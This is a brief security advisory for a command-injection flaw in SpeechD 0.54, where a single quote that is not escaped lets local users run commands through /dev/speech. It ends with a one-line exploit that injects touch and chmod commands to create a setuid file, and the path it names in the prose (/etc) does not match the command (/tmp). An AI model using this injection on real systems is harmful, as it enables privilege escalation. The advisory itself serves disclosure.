  Security Vulnerability in SpeechD
------------------------------------------------------------------------

SUMMARY

<http://www.speechio.org/speechd.html> SpeechD is a daemon that hooks
itself to the /dev/speech device, monitoring it for incoming text, and
whenever such text is detected the program will read it using a voice
synthesizer. Inadequate escaping of the ' character allows local attackers
to execute arbitrary commands with the daemon's permissions.

DETAILS

Vulnerable systems:
SpeechD version 0.54

Immune systems:
SpeechD version 0.55

A vulnerability in SpeechD allows attackers to run arbitrary code as the
root user or whoever is running SpeechD.

Exploit:
Executing the following command will cause the product to create a file
named /etc/evilfile with the settings of rwxs (setuid the user executing
SpeechD):
echo "';touch /tmp/evilfile;chmod a+rwxs /tmp/evilfile" >/dev/speech
